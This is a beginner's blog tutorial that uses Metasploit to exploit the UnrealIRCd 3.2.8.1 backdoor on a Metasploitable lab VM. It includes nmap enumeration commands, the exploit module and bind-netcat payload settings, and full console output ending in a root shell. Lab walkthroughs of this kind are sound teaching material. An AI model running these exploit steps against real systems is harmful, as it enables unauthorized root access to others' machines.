Hacking Metasploitable #1: Introduction & IRC Hack [Metasploit/Linux/Exploit/How-to]

Starting today, I will start releasing how-tos on hacking the Metasploitable distro of Linux released by the creators of Metasploit in which I will go through how to determine if a system is exploitable, how to use Metasploit, how to load modules and run exploits, and what to do once you have exploited a system.

I hope these posts, starting with this (#1), teach the readers the important parts of using Metasploit as well as the basics of Pentesting and exploitation. This is by no means a thorough series on exploitation, but a way to get basic users' hands wet in the world of exploitation and hacking.
Before we begin, I assume you have Metasploitable installed on VM or host box (I suggest a VM), Metasploit installed on a system (BT5R3 has it automatically installed, which I will be using for this), and a basic understanding on how to use a computer. If you do not have these, please see the linked how-tos or research more upon these topics. Let's begin.

To first understand the basics of this exploit, reading the Vulnerability Summary for CVE-2010-2075 (CVE stands for Common Vulnerabilities and Exposures) which can be read here. Summaries of exploits are commonly released and reviewed by the US government and other large security companies and can be searched for through many sites which are useful for understanding exploits and staying relevant in the security industry.

If you have read the exploit summary, you should have some understanding on how this exploit came to be and why it is dangerous. Backdoors like this are sometimes secretly hidden in software and take a while to come out, leading to scary exploits like this that allow root access quite easily. Now that we've discussed the exploit briefly, lets go over how we find a vulnerable machine and exploit it.

To open Metasploit, run the command:
msfconsole
It may take a while to open or spit a warning back at you saying that you need to chmod or run as root. If you're not running BT5R3 as default root, then you need to run msfconsole with sudo and enter your sudo password to load it up. If you receive this warning ctrl-c out of it and run
sudo msfconsole
I receive the following:
root@bt:~# msfconsole
# cowsay++
____________
< metasploit >
------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 978 exploits - 523 auxiliary - 160 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops
msf >
Whenever you start up Metasploit, there is a cute little banner which is sometimes an animal saying "metasploit" or an astroids based ASCII art. Regardless of what you see there, the important stuff is below.
Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders, and nops it has loaded. Then it presents the user (us) with the prompt, defined by "msf >".

From here we can start to enter commands. How do we know what to do though? You can receive the help screen and possible options by entering the command:
help
 Metasploit will output the following (I will only display a few lines since there are MANY options):
msf > help
Core Commands
=============
 
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
 
 <...snipped...>
So we can now see all options available to us. A shortcut for "help" is also a question mark ("?"). Please note that the actual output may be formatted slightly differently since it is a copy from terminal to a blog. I will however try to have it look as close as I can to the original, and where needed have screenshots.

The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.

To start off a pentest, we need to find the machines on the network. This step is the first step in actually pentesting a network. Note that before a pentest can occur you should have a written contract with explicit allowance for you to do so. Of course this is from a business point of view, so if you make a lab for practice like I did, you can skip right to the testing.

Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration" and is the most important part of conducting a penetration test. There are an infinite number of ways to collect intelligence on a network, company, or single node, but I am going to concentrate on the normal ways of attacking a lab-environment.

To find all targets on our network, we would just run an nmap scan against our subnet. There are many different options for nmap, including host OS discovery, stealthy scans, tracemaps, and many others. To make this tutorial quicker and easier, we are going to assume we know the IP of our target. Since you should be conducting this in a lab environment, you should know the IP of your Metasploitable machine, as well.

My Metasploitable machine is located at 192.168.1.110 and receives its IP address through my router's DHCP server. I will try to make it as dynamic as possible when giving instructions, but if I use screenshots, IPs may be different than yours.

Okay, now let's finally start exploiting this machine.
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can utilize the database built in to save our nmap scans.
Run this command to insure that our database is connected:
db_status
 You should receive something along the lines of:
[*] postgresql connected to msf3dev
If it spits out an error, then we need to connect our database; however, I will not get into this right now since I want to keep this tutorial on topic of exploitation and pentesting.

To scan this target with nmap and have it placed in the Metasploit database, run the command "db_nmap".
For this target, we are going to run a more thorough scan:
db_nmap -v -sS -A [ip-address]
The previous nmap options are as follows:
-v is "verbose" which means it will output more information for us to the screen.
-sS is the "SYN" or "stealth" scan, which doesn't  create a full connection to the host and is thus "stealthy". If you want to know more about this check out the nmap man page or other documention.
-A is an all-encompassing option which includes Operating System detection, version detection (like the -sV option), script scanning, and traceroute.
Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I'll show you how to easily determine your attack vector.

When your database has hosts in it, you can display which ones it has tracked with the "hosts" command.
Mine looks like this right now:

msf > hosts
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.110  00:0C:29:35:72:58        Linux    Ubuntu            server  
      
Pretty cool, right? IT has the IP, OS, flavor of OS, MAC, and more!
If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.

But how does this help us with our exploitation?  Metasploit also has the option to display all services detected by typing "services". This is my output after scanning the Metasploitable host:
msf > services

Services
========
host           port  proto  name         state  info
----           ----  -----  ----         -----  ----
192.168.1.110  21    tcp    ftp          open   vsftpd 2.3.4
192.168.1.110  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.110  23    tcp    telnet       open   Linux telnetd
192.168.1.110  25    tcp    smtp         open   Postfix smtpd
192.168.1.110  53    tcp    domain       open   ISC BIND 9.4.2
192.168.1.110  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.1.110  111   tcp    rpcbind      open   2 rpc #100000
192.168.1.110  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.1.110  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.1.110  512   tcp    exec         open   netkit-rsh rexecd
192.168.1.110  513   tcp    login        open
192.168.1.110  514   tcp    tcpwrapped   open
192.168.1.110  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry
192.168.1.110  1524  tcp    ingreslock   open
192.168.1.110  2049  tcp    nfs          open   2-4 rpc #100003
192.168.1.110  2121  tcp    ftp          open   ProFTPD 1.3.1
192.168.1.110  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
192.168.1.110  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
192.168.1.110  5900  tcp    vnc          open   VNC protocol 3.3
192.168.1.110  6000  tcp    x11          open   access denied
192.168.1.110  6667  tcp    irc          open   Unreal ircd
192.168.1.110  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
192.168.1.110  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
Well that is quite a bit more useful. We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running.
We can see port 6667 is running Unreal ircd. Unreal is a server for irc (internet relay chat), and the "d" at the end of ircd stands for "daemon" which means the port is listening for a service in the background.

Metasploit also has an awesome feature to find exploits, scanners, and other modules with the "search" option. We are going to run the following command to see if there's any modules for Unreal IRC:
search unreal
This produces the following:


msf > search unreal

Matching Modules
================
   Name                                        Disclosure Date          Rank       Description
   ----                                        ---------------          ----       -----------
   exploit/linux/games/ut2004_secure           2004-06-18 00:00:00 UTC  good       Unreal Tournament 2004 "secure" Overflow (Linux)
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
   exploit/windows/games/ut2004_secure         2004-06-18 00:00:00 UTC  good       Unreal Tournament 2004 "secure" Overflow (Win32)
Unfortunately since the output is so long, it has bumped the description to the following line, but it is still readable.
We can see there are two exploits for Unreal Tournament 2004 for Linux and Windows each, but neither of these are useful. The middle result and interesting one is the exploit for UnrealIRCD 3.2.8.1 Backdoor Command Execution rated as "excellent".
To load a module in Metasploit, we use the "use" command followed by the name of the module:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > 
As we can see, our prompt has changed to show that we are using an exploit module with the name. When we are using the "use" command, you can use "tab completion" which means if you're stuck, hitting the tab key will either complete the option, or if tapped twice, will display the options (if there are multiple). Most Linux users know this command since it is incredibly useful while moving through a file system or issuing commands quickly.

Now that we have the module loaded, issuing the command "show options" will of course show us the possible options.
msf  exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
There are only two options possible, and only one target which is automatic since this is only for one operating system. Both the options are required which means the exploit cannot be run without these. We can see the port is already set since IRC servers run on the port 6667 as a normal, but if someone is trying to hide the service on a different port, this can be changed.
To set or change an option, issue the "set" command followed by the option you wish to change and finally the variable you want to change it to, like as follows:

msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.110
RHOST => 192.168.1.110
Of course you would want to set your host IP to whatever the IP address is of your exploitable machine.

Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. We are going to statically set which payload to use in this tutorial to understand how to use them.
Since I know which payload I want to use, we won't search for which one to use, but if you want to, you can use the "search" command followed by what you are looking for (e.g. unix shell).

In this case we are going to use the netcat bind payload (if you have not used netcat, I highly suggest it. I will be writing a how-to for beginners on netcat eventually). To use this payload we run the command:

msf  exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_netcat
PAYLOAD => cmd/unix/bind_netcat
Let's finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. help exploit).
Running our exploit results in this:
msf  exploit(unreal_ircd_3281_backdoor) > exploit -z
[*] Started bind handler
[*] Connected to 192.168.1.110:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500
[*] Session x created in the background.
We see some output, and most notibly at the bottom "command shell session opened" and "session created in the background". If we didn't run this with the -z option and with no payload, the following output would have been produced:
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.1.110:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo aeuPuvLl90yRmhts;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "aeuPuvLl90yRmhts\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400
That's a lot of stuff, but it's pretty easy to understand. First it connects to the socket (which is an IP and port), and receives back the two following lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing certain gibberish, which is then written to two sockets. Those sockets are then read and what is received is output. After the backdoor goes through, a command shell is opened and labeled as "session 1".

Speaking from the the most previous exploit, what we should have is a blank screen. Let's get back to what you should have done previously since this is just another option in our exploiting phase. Keep in mind when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.

Now, we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is "sessions":
msf  exploit(unreal_ircd_3281_backdoor) > sessions
Active sessions
===============
  Id  Type        Information  Connection
  --  ----        -----------  ----------
  x   shell unix               192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)
Of course the IP addresses will be different than yours since we do not have the exact same network, but it should display your exploited system's IP address. The Id will also be the session # that you created, and is variable to how many sessions you have created.

Finally how we interact with this session is to issue the following command:

msf  exploit(unreal_ircd_3281_backdoor) > sessions -i x
[*] Starting interaction with x...
pwd
/etc/unreal
whoami
root
id
uid=0(root) gid=0(root)
So we can see, we interact with the session numbered x, then it brings us to that session which is a command prompt in the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid permissions.

This completes our tutorial on exploiting the Unreal IRCd backdoor vulnerability in Metasploit and basic tutorial for using msfconsole. If there are any questions as always post them and I will hopefully respond. Thanks for reading!


Popular posts from this blog

Vagrant "Fuse Device Not Found" Error Fix

How to Unfollow Blogs or "Reading List" on Google [Non-Technical]